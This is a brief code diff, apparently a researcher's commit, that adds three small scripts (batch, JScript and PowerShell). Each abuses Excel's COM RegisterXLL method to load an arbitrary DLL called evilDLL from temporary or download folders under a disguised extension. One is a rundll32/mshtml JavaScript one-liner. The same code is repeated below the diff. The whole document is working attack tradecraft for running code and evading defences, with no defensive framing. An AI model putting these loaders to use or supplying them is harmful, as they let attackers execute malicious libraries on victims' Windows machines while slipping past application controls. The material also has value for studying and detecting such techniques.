gavz · July 22, 2017 17:28
diff --git a/excel.bat b/excel.bat
 REM rundll32 mshtml.dll HTA one-liner command:
 rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();
diff --git a/excel.js b/excel.js
 // Create Instace of Excel.Application COM object
 var excel = new ActiveXObject("Excel.Application");
 // Pass in path to the DLL (can use any extension)
 excel.RegisterXLL("C:\\Users\\Bob\\AppData\\Local\\Temp\\evilDLL.xyz");
diff --git a/excel.ps1 b/excel.ps1
 # Create Instace of Excel.Application COM object
 $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))
 # Pass in path to the DLL (can use any extension)
 $excel.RegisterXLL("C:\Users\Bob\Downloads\evilDLL.txt")
	REM rundll32 mshtml.dll HTA one-liner command:
	rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();
	// Create Instace of Excel.Application COM object
	var excel = new ActiveXObject("Excel.Application");
	// Pass in path to the DLL (can use any extension)
	excel.RegisterXLL("C:\\Users\\Bob\\AppData\\Local\\Temp\\evilDLL.xyz");
	# Create Instace of Excel.Application COM object
	$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))
	# Pass in path to the DLL (can use any extension)
	$excel.RegisterXLL("C:\Users\Bob\Downloads\evilDLL.txt")